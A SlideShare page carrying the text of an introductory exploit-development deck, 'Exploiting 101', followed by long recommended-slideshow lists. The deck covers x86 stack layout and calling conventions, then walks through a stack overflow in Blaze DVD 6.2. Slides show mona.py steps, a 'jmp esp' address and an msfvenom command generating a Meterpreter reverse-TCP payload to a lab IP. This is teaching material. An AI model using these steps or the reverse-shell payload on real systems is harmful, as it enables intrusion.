SlideShare a Scribd company logo

Exploiting 101

Ackcent
Ackcent

An introduction to basic exploiting concepts, using and example without DEP and ASLR.

Technology
1 of 25
Download to read offline
2 § Exploiting: The art of take advantage of software vulnerabilities.
3 −Stack Buffer Overflow §Integer Overflow §Off-by-one −Heap Overflow §Use after free §Double Free −Memory Leaks §Format String
4
5 −General Purpose: EAX,EBX, ECX, EDX −Intruction Pointer: EIP −Frame Pointer: EBP −Stack Pointer: ESP
6 Main Parameters Saved EIP Saved EBP P1 (4 bytes) P2 (16 bytes) High Address Low Address source (4 bytes) dest (4 bytes) Saved EIP Saved EBP EBP, ESP Main stackframeCopyData StackFrame
7 §Intel AT&T −
8 § FastCall − Use ECX and EDX to pass arguments. (from left to right) − The rest of them through the stack. (from right to left) § Cdecl − Arguments are passed on the stack. (from right to left) − Used on C and C++. − EAX, ECX, and EDX are caller-saved − The rest are callee-saved. − The callee remove arguments from frame. § StdCall − Callee is responsible for cleaning up the stack − Parameters are pushed onto the stack in right-to-left order − Used by Win32 Api Calls.
9 Main Parameters Saved EIP Saved EBP Modified (4 bytes) P2 (16 bytes) High Address Low Address source (4 bytes) dest (4 bytes) Saved EIP Saved EBP EBP, ESP Main stackframeCopyData StackFrame
10
11
12
13 Blaze DVD 6.2 (Latest version) http://www.blazevideo.com/dvd-player/ CVE-2006-6199 File format Vulnerability with RCE via a Stack-Overflow. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6199
14 ASLR DEP Stack-cookie
15 !mona config -set workingfolder C:Documents and SettingstestEscritorioMona_results Mona.py
16 Immunity Debugger
17 Metasploit
18 Mona.py
19 Log data, item 21 Address=7C874413 Message= 0x7c874413 : "jmp esp" | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5781 (C:WINDOWSsystem32kernel32.dll) Memory info: https://msdn.microsoft.com/es-es/library/windows/desktop/aa366786(v=vs.85).aspx
20 ./msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.192.1 LPORT=4444 -b 'x00x0ax1a' –f perl -o ~/Exploiting/Blaze DVD Example/shellcode_perl.pl
21 Badchars: Every byte that could break the shellcode. With Mona.py 1. Obtain a badchar array: 1. !mona bytearray -b 'x00’ 2. Execute the exploit with the array as a shellcode. 3. Compare memory 1. !mona compare -f C:Documents and SettingstestEscritorioMona_resultsbytearray
22 Trash_1• Separating ESP from Shellcode. • SUB ESP,20 = x83xecx14 With Radare High Address Low Address Shellcode Trash_2 EIP EIPESP - 20
23 Executing Code with Metasploit
24 Woot!
25

Recommended

The Stack and Buffer Overflows
The Stack and Buffer OverflowsThe Stack and Buffer Overflows
The Stack and Buffer OverflowsUTD Computer Security Group
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacksn|u - The Open Security Community
 
Course lecture - An introduction to the Return Oriented Programming
Course lecture - An introduction to the Return Oriented ProgrammingCourse lecture - An introduction to the Return Oriented Programming
Course lecture - An introduction to the Return Oriented ProgrammingJonathan Salwan
 
An introduction to ROP
An introduction to ROPAn introduction to ROP
An introduction to ROPSaumil Shah
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingSaumil Shah
 
Return oriented programming (ROP)
Return oriented programming (ROP)Return oriented programming (ROP)
Return oriented programming (ROP)Pipat Methavanitpong
 
ROP
ROPROP
ROPJian-Yu Li
 
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part IReturn Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part In|u - The Open Security Community
 

Recommended

The Stack and Buffer Overflows
The Stack and Buffer OverflowsThe Stack and Buffer Overflows
The Stack and Buffer OverflowsUTD Computer Security Group
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacksn|u - The Open Security Community
 
Course lecture - An introduction to the Return Oriented Programming
Course lecture - An introduction to the Return Oriented ProgrammingCourse lecture - An introduction to the Return Oriented Programming
Course lecture - An introduction to the Return Oriented ProgrammingJonathan Salwan
 
An introduction to ROP
An introduction to ROPAn introduction to ROP
An introduction to ROPSaumil Shah
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingSaumil Shah
 
Return oriented programming (ROP)
Return oriented programming (ROP)Return oriented programming (ROP)
Return oriented programming (ROP)Pipat Methavanitpong
 
ROP
ROPROP
ROPJian-Yu Li
 
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part IReturn Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part In|u - The Open Security Community
 
How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談hackstuff
 
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDBJian-Yu Li
 
Seh based attack
Seh based attackSeh based attack
Seh based attackMihir Shah
 
(8) cpp stack automatic_memory_and_static_memory
(8) cpp stack automatic_memory_and_static_memory(8) cpp stack automatic_memory_and_static_memory
(8) cpp stack automatic_memory_and_static_memoryNico Ludwig
 
Mona cheatsheet
Mona cheatsheetMona cheatsheet
Mona cheatsheetCe.Se.N.A. Security
 
Embedded c programming
Embedded c programmingEmbedded c programming
Embedded c programmingPriyaDYP
 
Lec05
Lec05Lec05
Lec05siddu kadiwal
 
Return oriented programming
Return oriented programmingReturn oriented programming
Return oriented programminghybr1s
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick reviewCe.Se.N.A. Security
 
Embedded C - Lecture 4
Embedded C - Lecture 4Embedded C - Lecture 4
Embedded C - Lecture 4Mohamed Abdallah
 
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...The Linux Foundation
 
TLPI - 6 Process
TLPI - 6 ProcessTLPI - 6 Process
TLPI - 6 ProcessShu-Yu Fu
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationQuinn Wilton
 
PE File Format
PE File FormatPE File Format
PE File Formatn|u - The Open Security Community
 
Optimizing Erlang Code for Speed
Optimizing Erlang Code for SpeedOptimizing Erlang Code for Speed
Optimizing Erlang Code for SpeedViktor Sovietov
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stackAlexandre Moneger
 
PHP 7 performances from PHP 5
PHP 7 performances from PHP 5PHP 7 performances from PHP 5
PHP 7 performances from PHP 5julien pauli
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflowsjohseg
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on LinuxSam Bowne
 
CNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on LinuxCNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on LinuxSam Bowne
 

More Related Content

What's hot

How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談hackstuff
 
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDBJian-Yu Li
 
Seh based attack
Seh based attackSeh based attack
Seh based attackMihir Shah
 
(8) cpp stack automatic_memory_and_static_memory
(8) cpp stack automatic_memory_and_static_memory(8) cpp stack automatic_memory_and_static_memory
(8) cpp stack automatic_memory_and_static_memoryNico Ludwig
 
Embedded c programming
Embedded c programmingEmbedded c programming
Embedded c programmingPriyaDYP
 
Return oriented programming
Return oriented programmingReturn oriented programming
Return oriented programminghybr1s
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick reviewCe.Se.N.A. Security
 
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...The Linux Foundation
 
TLPI - 6 Process
TLPI - 6 ProcessTLPI - 6 Process
TLPI - 6 ProcessShu-Yu Fu
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationQuinn Wilton
 
Optimizing Erlang Code for Speed
Optimizing Erlang Code for SpeedOptimizing Erlang Code for Speed
Optimizing Erlang Code for SpeedViktor Sovietov
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stackAlexandre Moneger
 
PHP 7 performances from PHP 5
PHP 7 performances from PHP 5PHP 7 performances from PHP 5
PHP 7 performances from PHP 5julien pauli
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflowsjohseg
 

What's hot (20)

How Functions Work
How Functions WorkHow Functions Work
How Functions Work
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談
 
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDB
 
Seh based attack
Seh based attackSeh based attack
Seh based attack
 
(8) cpp stack automatic_memory_and_static_memory
(8) cpp stack automatic_memory_and_static_memory(8) cpp stack automatic_memory_and_static_memory
(8) cpp stack automatic_memory_and_static_memory
 
Mona cheatsheet
Mona cheatsheetMona cheatsheet
Mona cheatsheet
 
Embedded c programming
Embedded c programmingEmbedded c programming
Embedded c programming
 
Lec05
Lec05Lec05
Lec05
 
Return oriented programming
Return oriented programmingReturn oriented programming
Return oriented programming
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
 
Embedded C - Lecture 4
Embedded C - Lecture 4Embedded C - Lecture 4
Embedded C - Lecture 4
 
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
 
TLPI - 6 Process
TLPI - 6 ProcessTLPI - 6 Process
TLPI - 6 Process
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
 
PE File Format
PE File FormatPE File Format
PE File Format
 
Optimizing Erlang Code for Speed
Optimizing Erlang Code for SpeedOptimizing Erlang Code for Speed
Optimizing Erlang Code for Speed
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
PHP 7 performances from PHP 5
PHP 7 performances from PHP 5PHP 7 performances from PHP 5
PHP 7 performances from PHP 5
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflows
 

Similar to Exploiting 101

127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on LinuxSam Bowne
 
CNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on LinuxCNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on LinuxSam Bowne
 
CNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxCNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxSam Bowne
 
CNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on LinuxCNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on LinuxSam Bowne
 
CNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxCNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxSam Bowne
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJapneet Singh
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on LinuxSam Bowne
 
Reversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basicsReversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basicsCysinfo Cyber Security Community
 
Reversing & malware analysis training part 4 assembly programming basics
Reversing & malware analysis training part 4 assembly programming basics Reversing & malware analysis training part 4 assembly programming basics
Reversing & malware analysis training part 4 assembly programming basics Abdulrahman Bassam
 
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming BasicsReversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basicssecurityxploded
 
Introduction to debugging linux applications
Introduction to debugging linux applicationsIntroduction to debugging linux applications
Introduction to debugging linux applicationscommiebstrd
 
Improved Reliable Streaming Processing: Apache Storm as example
Improved Reliable Streaming Processing: Apache Storm as exampleImproved Reliable Streaming Processing: Apache Storm as example
Improved Reliable Streaming Processing: Apache Storm as exampleDataWorks Summit/Hadoop Summit
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W mattersAlexandre Moneger
 
04basic Concepts
04basic Concepts04basic Concepts
04basic ConceptsZhiwen Guo
 
Diving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterDiving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterOguzhan Topgul
 
CNIT 127 Ch 1: Before you Begin
CNIT 127 Ch 1: Before you BeginCNIT 127 Ch 1: Before you Begin
CNIT 127 Ch 1: Before you BeginSam Bowne
 
other-architectures.ppt
other-architectures.pptother-architectures.ppt
other-architectures.pptJaya Chavan
 

Similar to Exploiting 101 (20)

127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
CNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on LinuxCNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on Linux
 
CNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxCNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on Linux
 
CNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on LinuxCNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on Linux
 
CNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxCNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in Linux
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
Reversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basicsReversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basics
 
Reversing & malware analysis training part 4 assembly programming basics
Reversing & malware analysis training part 4 assembly programming basics Reversing & malware analysis training part 4 assembly programming basics
Reversing & malware analysis training part 4 assembly programming basics
 
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming BasicsReversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
 
Introduction to debugging linux applications
Introduction to debugging linux applicationsIntroduction to debugging linux applications
Introduction to debugging linux applications
 
Improved Reliable Streaming Processing: Apache Storm as example
Improved Reliable Streaming Processing: Apache Storm as exampleImproved Reliable Streaming Processing: Apache Storm as example
Improved Reliable Streaming Processing: Apache Storm as example
 
fg.workshop: Software vulnerability
fg.workshop: Software vulnerabilityfg.workshop: Software vulnerability
fg.workshop: Software vulnerability
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
 
04basic Concepts
04basic Concepts04basic Concepts
04basic Concepts
 
Diving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterDiving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow Better
 
Coal (1)
Coal (1)Coal (1)
Coal (1)
 
CNIT 127 Ch 1: Before you Begin
CNIT 127 Ch 1: Before you BeginCNIT 127 Ch 1: Before you Begin
CNIT 127 Ch 1: Before you Begin
 
other-architectures.ppt
other-architectures.pptother-architectures.ppt
other-architectures.ppt
 
Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash Course
 

Recently uploaded

Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfngoud9212
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 

Recently uploaded (20)

Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 

Exploiting 101

  • 1.
  • 2. 2 § Exploiting: The art of take advantage of software vulnerabilities.
  • 3. 3 −Stack Buffer Overflow §Integer Overflow §Off-by-one −Heap Overflow §Use after free §Double Free −Memory Leaks §Format String
  • 4. 4
  • 5. 5 −General Purpose: EAX,EBX, ECX, EDX −Intruction Pointer: EIP −Frame Pointer: EBP −Stack Pointer: ESP
  • 6. 6 Main Parameters Saved EIP Saved EBP P1 (4 bytes) P2 (16 bytes) High Address Low Address source (4 bytes) dest (4 bytes) Saved EIP Saved EBP EBP, ESP Main stackframeCopyData StackFrame
  • 8. 8 § FastCall − Use ECX and EDX to pass arguments. (from left to right) − The rest of them through the stack. (from right to left) § Cdecl − Arguments are passed on the stack. (from right to left) − Used on C and C++. − EAX, ECX, and EDX are caller-saved − The rest are callee-saved. − The callee remove arguments from frame. § StdCall − Callee is responsible for cleaning up the stack − Parameters are pushed onto the stack in right-to-left order − Used by Win32 Api Calls.
  • 9. 9 Main Parameters Saved EIP Saved EBP Modified (4 bytes) P2 (16 bytes) High Address Low Address source (4 bytes) dest (4 bytes) Saved EIP Saved EBP EBP, ESP Main stackframeCopyData StackFrame
  • 10. 10
  • 11. 11
  • 12. 12
  • 13. 13 Blaze DVD 6.2 (Latest version) http://www.blazevideo.com/dvd-player/ CVE-2006-6199 File format Vulnerability with RCE via a Stack-Overflow. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6199
  • 15. 15 !mona config -set workingfolder C:Documents and SettingstestEscritorioMona_results Mona.py
  • 19. 19 Log data, item 21 Address=7C874413 Message= 0x7c874413 : "jmp esp" | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5781 (C:WINDOWSsystem32kernel32.dll) Memory info: https://msdn.microsoft.com/es-es/library/windows/desktop/aa366786(v=vs.85).aspx
  • 20. 20 ./msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.192.1 LPORT=4444 -b 'x00x0ax1a' –f perl -o ~/Exploiting/Blaze DVD Example/shellcode_perl.pl
  • 21. 21 Badchars: Every byte that could break the shellcode. With Mona.py 1. Obtain a badchar array: 1. !mona bytearray -b 'x00’ 2. Execute the exploit with the array as a shellcode. 3. Compare memory 1. !mona compare -f C:Documents and SettingstestEscritorioMona_resultsbytearray
  • 22. 22 Trash_1• Separating ESP from Shellcode. • SUB ESP,20 = x83xecx14 With Radare High Address Low Address Shellcode Trash_2 EIP EIPESP - 20
  • 25. 25